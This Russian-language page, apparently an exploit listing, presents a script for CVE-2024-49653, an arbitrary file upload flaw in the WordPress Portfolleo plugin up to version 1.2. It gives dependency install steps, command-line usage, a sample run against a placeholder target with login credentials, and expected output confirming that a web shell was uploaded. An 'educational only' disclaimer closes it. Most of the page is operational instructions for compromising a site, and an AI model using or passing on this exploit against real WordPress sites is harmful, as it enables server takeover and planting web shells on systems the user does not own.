
Плагин Portfolleo для WordPress <= 1.2 - уязвимость произвольной загрузки файлов
Название: Плагин WordPress Portfolleo <= 1.2 — уязвимость произвольной загрузки файлов
Описание:
Уязвимость неограниченной загрузки файлов с опасным типом в плагине Portfolleo от James Eggers позволяет загружать веб-шелл на веб-сервер. Эта проблема затрагивает Portfolleo начиная с версии n/a и до 1.2.
Подробнее:
Оценка CVSS:
Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов в плагине WordPress Portfolleo (версии <= 1.2) для загрузки веб-шелла.
Для запуска скрипта должны быть установлены следующие компоненты:
requestsbeautifulsoup4Вы можете установить необходимые библиотеки с помощью:
pip install requests beautifulsoup4
Запустите скрипт со следующими параметрами:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
Если скрипт выполнится успешно, вы должны увидеть следующий вывод:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
Этот скрипт предназначен только для образовательных целей. Автор не одобряет использование этого скрипта для незаконных действий. Используйте его ответственно и только на тех системах, на которые у вас есть явное разрешение на тестирование.
Автор: Nxploited | Khaled Alenazi